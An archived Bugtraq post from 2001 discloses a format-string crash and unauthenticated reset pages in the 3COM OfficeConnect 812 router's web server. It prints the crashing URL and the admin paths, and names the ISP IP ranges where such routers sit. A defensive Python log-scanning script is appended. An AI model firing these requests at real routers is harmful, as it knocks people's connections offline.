Bugtraq mailing list archives

3COM OfficeConnect DSL router vulnerabilities


From: "inc" <ix_lsd () hotmail com>
Date: Tue, 15 May 2001 14:56:08 +0200

Last night I discovered a vulnerability. The router is a 3COM
OfficeConnect 812 and the vulnerability is in the HTTP server, on port 80.
When you connect with a browser to one of these routers, you are asked for
user/password; if you fail, you see a web page telling you that it is a
protected object, but there is a .GIF file you have access to and you don't
need to put the .GIF.

http://192.168.1.254/graphics/sml3com

well... you put this, and you see the image...

well.... let's add a long string later

Exploit:
--------

http://192.168.1.254/graphics/sml3com%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%
s%s%s%s%s%s%s%s%s%%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s
%s%s%s%s%s%s%s

...the router causes an NMI, red lights, flashing lights... and it's dead...
it disconnects and comes online again in a minute.

3COM OfficeConnect 812 is the router that Terra (from Telefonica Spain) puts
on almost all DSL connections, even for all sorts of business. They are selling
this router now even when there is a better firmware (not tested yet) that maybe
resolves this problem.

Solution: put filters on the router for the remote sites and only allow
connections to 23 and 80 from the local network. If you're Spanish, take care
cos your IP is fixed and you have a very "clear" domain 195.255.*.* and
217.97.*.*

Not Copyrighted by UnMateria - May 2001 :-)


ANNEX:

http://192.168.1.254/adsl_pair_select
http://192.168.1.254/adsl_reset

Very insecure for strangers ;-)... the server here doesn't ask for a password
so you cant reset the router from the own web (and without credentials)
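
A detection-side illustration of the post's two observations (runs of %s in the request URI, and admin pages served without a password) together with its advice to restrict ports 23 and 80 to the local network. This is an added example, not part of the original post; the log format, the 192.168.1.0/24 LAN range, the threshold and the sample lines are assumptions constructed for illustration.

```python
import ipaddress
import re

# Assumption: the LAN is 192.168.1.0/24 (the post only shows the router at 192.168.1.254).
LOCAL_NET = ipaddress.ip_network("192.168.1.0/24")
# A valid URL escape is '%' plus two hex digits; '%s', '%n', '%x' are printf
# conversions, not URL escapes, so a run of them in a URI is worth flagging.
FORMAT_SPEC = re.compile(r"%(?![0-9A-Fa-f]{2})[sdnxpcu]", re.IGNORECASE)
MIN_SPECS = 3  # assumption: tolerate an isolated botched escape
# The two pages the annex reports as reachable without a password.
UNAUTH_PATHS = ("/adsl_pair_select", "/adsl_reset")

# Constructed sample input, format "<source ip> <method> <uri>" (not real traffic).
SAMPLE_LOG = """\
192.168.1.10 GET /graphics/sml3com
203.0.113.7 GET /graphics/sml3com%s%s%s%s
192.168.1.10 GET /adsl_reset
192.168.1.23 GET /graphics/sml3com?x=a%20b
"""


def classify(src, uri):
    """Return the reasons a request to the router's web server is suspicious."""
    findings = []
    if ipaddress.ip_address(src) not in LOCAL_NET:
        findings.append("remote-source")
    if len(FORMAT_SPEC.findall(uri)) >= MIN_SPECS:
        findings.append("format-specifiers")
    if uri.split("?", 1)[0] in UNAUTH_PATHS:
        findings.append("unauthenticated-admin-path")
    return findings


def scan(log_text):
    """Return (line number, findings) for every flagged line of the log."""
    hits = []
    for number, line in enumerate(log_text.splitlines(), start=1):
        parts = line.split(None, 2)
        if len(parts) != 3:
            continue  # skip lines that do not match the assumed format
        findings = classify(parts[0], parts[2])
        if findings:
            hits.append((number, findings))
    return hits


if __name__ == "__main__":
    for number, findings in scan(SAMPLE_LOG):
        print(f"line {number}: {', '.join(findings)}")
```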

